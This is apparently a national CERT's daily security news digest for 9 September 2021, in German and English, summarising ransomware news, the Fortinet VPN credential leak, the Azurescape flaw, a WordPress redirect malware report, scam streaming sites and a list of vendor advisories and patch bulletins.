Tageszusammenfassung - 09.09.2021

End-of-Day report

Timeframe: Mittwoch 08-09-2021 18:00 - Donnerstag 09-09-2021 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner


Ransomware: Erpressungs-Website der "REvil"-Gang plötzlich wieder online

Die Gang, deren Kaseya-Lieferkettenangriff Schlagzeilen machte, war Mitte Juli von der Bildfläche verschwunden - nun ist ihre Tor-Onion-Leak-Site wieder aktiv.


Betrügerische Streaming-Plattformen verschicken ungerechtfertigte Zahlungsaufforderungen!

Zahlreiche InternetnutzerInnen stolpern bei der Suche nach Hollywood-Blockbustern auf Webseiten wie kinox.su, justhdfilme.com oder kinox-deutsch.com. Wer auf einer solchen Seite versucht einen Film zu schauen, wird auf weitere betrügerische Websites wie luguplay.de, playnate.de oder rubuplay.de weitergeleitet. Nach einer angeblich kostenlosen Anmeldung auf diesen Seiten, können Sie sich keinen Film ansehen - stattdessen erhalten Sie Rechnungen und Mahnungen. Zahlen Sie auf keinen Fall!


Fortinet warns customers after hackers leak passwords for 87,000 VPNs

Networking equipment vendor Fortinet has notified customers today that a cybercriminal gang has assembled a collection of access credentials for more than 87,000 FortiGate SSL-VPN devices. "This incident is related to an old vulnerability resolved in May 2019," the company said in a blog post following an inquiry from The Record sent on Tuesday, when a small portion of this larger list was published on a private cybercrime forum hosted on the dark web, and later on the website of a ransomware gang, [...]


Microsoft fixes bug letting hackers take over Azure containers

Microsoft has fixed a vulnerability in Azure Container Instances called Azurescape that allowed a malicious container to take over containers belonging to other customers on the platform.


Updates to Our Datafeeds/API, (Thu, Sep 9th)

Most of the data we are collecting is freely available via our API. For quick documentation, see https://isc.sans.edu/api. One particular popular feed is our list of "Researcher IPs." These are IP addresses connected to commercial and academic projects that scan the internet. These scans can account for a large percentage of your unsolicited inbound activity. One use of this feed is to add "color to your logs" by enriching your log data from this feed.


Multistage WordPress Redirect Kit

Recently, one of our analysts @kpetku came across a series of semi-randomised malware injections in multiple WordPress environments. Typical of spam redirect infections, the malware redirects visitors by calling malicious files hosted on third party infected websites. Interestingly, the infection stores itself as encoded content in the database and is called through random functions littered throughout plugin files using a very common wordpress function -get_option-.


Get Ready for PYSA Ransomware Attacks Against Linux Systems

Linux is increasingly targeted by ransomware. Researchers have now detected indications that the PYSA ransomware, often also known as Mespinoza, is also being readied for Linux targets. read more


Analysis of a Parallels Desktop Stack Clash Vulnerability and Variant Hunting using Binary Ninja

Parallels Desktop uses a paravirtual PCI device called the -Parallels ToolGate- for communication between guest and host OS. This device is identified by Vendor ID 0x1AB8 and Device ID 0x4000 in a Parallels guest. The guest driver provided as part of Parallels Tools and the host virtual device communicate using a ToolGate messaging protocol. To provide a summary, the guest driver prepares a message and writes the physical address of the message to [...]


When the Cyberthreat Comes from the Inside

Would you like to earn millions of dollars? The LockBit 2.0 ransomware are now trying to recruit insiders - and there is no reason to believe that your company wouldn-t be targeted. The global competitive framework has changed significantly: hybrid warfare with methods like infiltration and espionage will be an imminent threat against the strategic environment for the foreseeable future.



OpenVPN for Linux and FreeBSD: Schwachstelle ermöglicht Umgehung von Sicherheitsvorkehrungen

Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Linux und OpenVPN ausnutzen, um einen Denial of Service zu verursachen oder Sicherheitsvorkehrungen zu umgehen


Cisco Security Advisories

Cisco hat zehn Security Advisories veröffentlicht. Keine der darin behobenen Schwachstellen wird als "critical" eingestuft, vier als "high".


ABB: EIBPORT several CVEs ABBVREP0049_R9120

ABB is aware of vulnerabilities in the product versions listed above. A firmware update is available that resolves these privately reported vulnerabilities in the product versions listed above. An attacker who successfully exploited these vulnerabilities could access sensitive information stored inside the device and can access the device with root privileges. CVE-IDs: CVE-2021-28909, CVE-2021-28910, CVE-2021-28911, CVE-2021-28912, CVE-2021-28913, CVE-2021-28914


GitHub entdeckt sieben Sicherheitslücken in Node.js Packages

In einem Rahmen Bug-Bounty-Programm hat GitHub Schwachstellen aufgedeckt und bietet Handlungsanweisungen für betroffene Nutzer.


Security updates for Thursday

Security updates have been issued by Fedora (lynx, matrix-synapse, and proftpd), openSUSE (ntfs-3g_ntfsprogs), Oracle (kernel), Red Hat (RHV-H), Scientific Linux (kernel), and Ubuntu (libapache2-mod-auth-mellon, linux, linux-aws, linux-aws-5.11, linux-azure, linux-azure-5.11, linux-gcp, linux-hwe-5.11, linux-kvm, linux-oracle, linux-oracle-5.11, linux-raspi, linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-gcp, linux-gcp-5.4, linux-gke, linux-gke-5.4, linux-gkeop, [...]


Intel processor vulnerabilities CVE-2021-0086 and CVE-2021-0089


SaltStack Salt: Mehrere Schwachstellen


WordPress: Mehrere Schwachstellen


Security Advisory - Improper Authorization Vulnerability in Some Huawei Products


Security Bulletin: IBM Security Guardium is affected by an Improper Restriction of Excessive Authentication Attempts vulnerability (CVE-2021-20427)


Security Bulletin: Security vulnerabilitiy has been fixed in IBM Security Identity Manager (CVE-2021-29692)


Security Bulletin: IBM Security Guardium is affected by an OpenLDAP vulnerability (CVE-2020-25692)


Security Bulletin: Security vulnerabilities have been identified in IBM® Java SDK that affect IBM Security Directory (CVE-2021-2161)


Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium


Security Bulletin: Vulnerability in NX-OS Firmware used by IBM c-type SAN directors and switches.


Security Bulletin: Security vulnerabilitiy has been identified in IBM® Java SDK that affect IBM Security Directory Suite (CVE-2021-2161)


Security Bulletin: Container Environment Vulnerabilities Affect IBM Secure Proxy (CVE-2020-14298, CVE-2020-14300)


Security Bulletin: IBM Security Guardium is affected by a kernel vulnerability (CVE-2020-25705, CVE-2020-28374)


Security Bulletin: IBM Security Guardium is affected by a Reliance on Untrusted Inputs in Security Descision


Security Bulletin: IBM Security Guardium is affected by a Weak Password Policy vulnerability (CVE-2021-20418)


Security Bulletin: IBM Security Guardium is affected by a Oracle MySQL vulnerabilities